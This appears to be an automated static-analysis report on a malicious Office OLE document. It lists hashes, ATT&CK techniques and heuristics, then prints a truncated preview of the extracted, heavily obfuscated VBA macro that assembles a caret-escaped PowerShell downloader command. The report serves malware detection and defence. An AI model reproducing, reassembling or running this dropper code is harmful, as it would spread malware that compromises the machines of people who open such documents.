Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 65fbe169c5563d91…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 91.0 KB
First seen: 2019-03-10
MD5: d99c974703a61ff8291b76a8a160147a
SHA-1: c99036834fd31309ea97bfd50828d75be19a01f3
SHA-256: 65fbe169c5563d919129f907e97bffbdf79711fba090182950c7ad6caf53d5e7
Risk Score: 62

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The OLE document contains VBA macros that, when executed, construct and run a PowerShell command. This command appears to be designed to download and execute a second-stage payload, indicated by the obfuscated string 'md /v^:O/c s^E^t ^4^I^u^m^=p^ow)x^s^h)^l^l'. The large slack space in the OLE file is also suspicious and may be used to hide malicious content.

Heuristics (3)

  • OLE document has large unaccounted-for region [severity: high] OLE_SLACK_ANOMALY
    OLE file is 93,184 bytes but its declared streams total only 36,445 bytes — 56,739 bytes (61%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected [severity: medium] OLE_VBA_MACROS
    Document contains VBA macro code.
  • Embedded URL [severity: info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10778 bytes
SHA-256: 20dd4a0320a1d58c355f7f670be363fedca1070e2545d883bdd388135b413e9b

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "HMQYWlKi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "lHjrUoaS"
Function YLRWtFl()
On Error Resume Next
IsArray CDate(OBqQBV - vwBoSo)
   VKnsP = jNUCF - GzIwdK * uILnN + iVkjl
   IsArray Sqr(NijkS)
   VarType LCase(22305 * sXaAn / GIakYk / zFPihb)
JWnPFpPBYbP = "md" + " " + "/v^:" + "O/c   " + CStr(Chr(AZFWNzKIbEC + kmwivNvKmPatz + 34 + iEMNYiD + KwuRwjfh)) + "  s^E" + "^t " + "   ^ " + "^4^I^" + "u^m^=p^" + "ow)x^" + "s^h)^l" + "^l"
VarType Log(4)
jQmUiAfmmT = "^ " + "-)^ ^" + "[^A" + "?^[^A" + "^+oA" + "cA^A9" + "^A^" + "+^4A^" + "ZQ" + "?3" + "^AC^0^A"
VKnsP = MZsJI + hSYLb
aWjna = "^bw?^" + "iA" + "+^o^A" + "^ZQ^?j^" + "A^H^Q^A" + "^I^" + "A?^O^A" + "^+UAd" + "AA" + "u^A" + "'c^AZQ^"
VarType hKLqwO - zVRCR / 25307 * oMqtj
   VarType Tan(bpTbNX)
   VarType Int(AEfpiw)
IdHMzZBSu = "?^i" + "A^EM^" + "AbA?p" + "A+^U^Ab" + "g?0^"
VKnsP = Oct(82734 / 19718)
   VKnsP = 57875 - owrmk
   VarType Sqr(moizDq)
   VarType CDec(3266)
   IsArray Hex(7028)
iKozGM = "AD^s" + "A[A^?" + "^" + "M^AHo^A" + "^Z^gA^" + "9^A"
VKnsP = CDec(uLVMB)
kUfAjpfs = "C" + "c" + "^A^\A" + "^?0A" + "^HQ^A" + "c^A^A^"
VarType Str(59989 * lXYtC + 95065 + pTMscI)
   IsArray Hex(3)
   VarType 4111 / QQIpa
   VKnsP = Str(kvXWT)
   VarType Second(nSItk)
KEanfHfbd = ",^AC" + "^" + "8AL^w^" + "?z^A+E" + "^" + "A" + "b^g?vAC" + "4^A^\" + "^Q" + "^?^" + "]^AC^" + "8^A"
VarType MiPYu + VLiAr - wfbIR - YqwEKY
   IsArray uXWTX + nCjDad + 65604 * RqpSZX
MwXQhj = "(^" + "A?^`A+I" + "A^\^g" + "^?^ZAD" + "M^" + "Ab" + "^g?A^A" + "+"
VarType TimeValue(253183858)
   IsArray CBool(558)
   IsArray Second(jdULI / VLrEwj)
fNYIbMQkWaF = "^g^Ad" + "^A" + "?0A^H^A" + "^" + "A^" + "Og" + "A" + "vAC" + "8" + "A^Z^"
YLRWtFl = JWnPFpPBYbP + jQmUiAfmmT + aWjna + IdHMzZBSu + iKozGM + kUfAjpfs + KEanfHfbd + MwXQhj + fNYIbMQkWaF
   VKnsP = CDate(14519 / qWqzp / JojZdU * 68430)
   VarType 50642 / 72586
   VarType 85356 / PhBjzq
End Function
Function pzijAUz()
On Error Resume Next
IsArray Oct(94)
rJTDM = "w?]" + "AH^U" + "^A)^g" + "^" + "?" + "v^" + "A^+^w" + "A^" + "d^Q" + "?^iA" + "C^4Ac^"
VKnsP = CDbl(9)
   VarType Sqr(ikmcLT)
IaofrC = "g?" + "1^A" + "C" + "^8^AM^w" + "^?QAH" + "^IA\^Q" + "^?^UA^'" + "^`^AQA" + "^?"
IsArray Val(ZjlQL / rNzQnO - kcwAlT + wwLpan)
   VarType cJssD + 45380 - csnsn + lCAOS
   IsArray Oct(hdLhCc / DtfdYk)
PrGtnqWztjj = "o^AH^Q" + "AdA" + "?^wA^D" + "o^A^L" + "w" + "Av^" + "A^" + "+YAb^" + "w?]^A" + "+U^A)A"
VKnsP = KUCZY + UdBTmq
   VarType QONkT + jcmQE
LpKjzHJDK = "?" + "^0AH" + "^I^AY" + "Q?^`A" + "^+^`A^b" + "^g" + "^?nA+^"
VKnsP = paHITz - huimu / 51839 - DrQih
   VKnsP = Str(1)
   IsArray 39495 + BzhLv
   VarType Hex(2975)
   VarType Oct(pXfIAp)
tARnhVQERrj = "Y" + "^Acg?^" + "4^A" + "C^" + "4" + "Abw?^]^" + "A^+" + "cA" + "^Lw"
VKnsP = Month(VUiYJ)
   IsArray Month(18492 / dUjKf + aUcUos - IOwUQ)
wDSsRwb = "?^mAD^Y" + "^A^WQ^" + "?" + "^]^A" + "^+`^" + "A^"
VarType nWZMSR * wotiGO
jVfvlLjiiq = "QA^?" + "o^A^H^Q" + "A^d^A" + "^" + "?w^A^D" + "o^AL^w^" + "Av^A+^E" + "^A^bA?" + "^]A+UAY" + "Q^?`^A^" + "H`A\^" + "A^?v"
VKnsP = CDate(1)
GzKwcPUFB = "^A^" + "HM" + "^A^d^" + "A^A^u" + "^A" + "^+`Ad" + "^A^?oA+" + "`A^bg" + "?" + "#^A" + "C" + "^4^A^b" + "^g^?"
VarType Log(FBwKm)
   IsArray CDec(XEvGWY)
   VKnsP = MZNjbT - uNFfDt / 12835 / iqwKz
   IsArray Log(zXobJ)
FlSHPV = "lAH" + "^Q^A" + "LwA^#^" + "A^+^" + "IA^W" + "^g^?" + "^" + "A^A" + "+^gAdA?"
IsArray CStr(89)
   VarType Int(kAYGj)
   VarType 28348 / MRoZpu / 77 + EmHDj
GLqUTGKB = "0" + "AH^AA^" + "O" + "^g^AvAC" + "^8^A" + "^ZQ?^2" + "A+" + "8" + "A^L" + "^g" + "?nA" + "+^U" + "A^Lw?(^"
pzijAUz = rJTDM + IaofrC + PrGtnqWztjj + LpKjzHJDK + tARnhVQERrj + wDSsRwb + jVfvlLjiiq + GzKwcPUFB + FlSHPV + GLqUTGKB
   VKnsP = TypeName(HDalfY)
   IsArray Fix(3300)
   VKnsP = CDbl(wUDJ
... (truncated)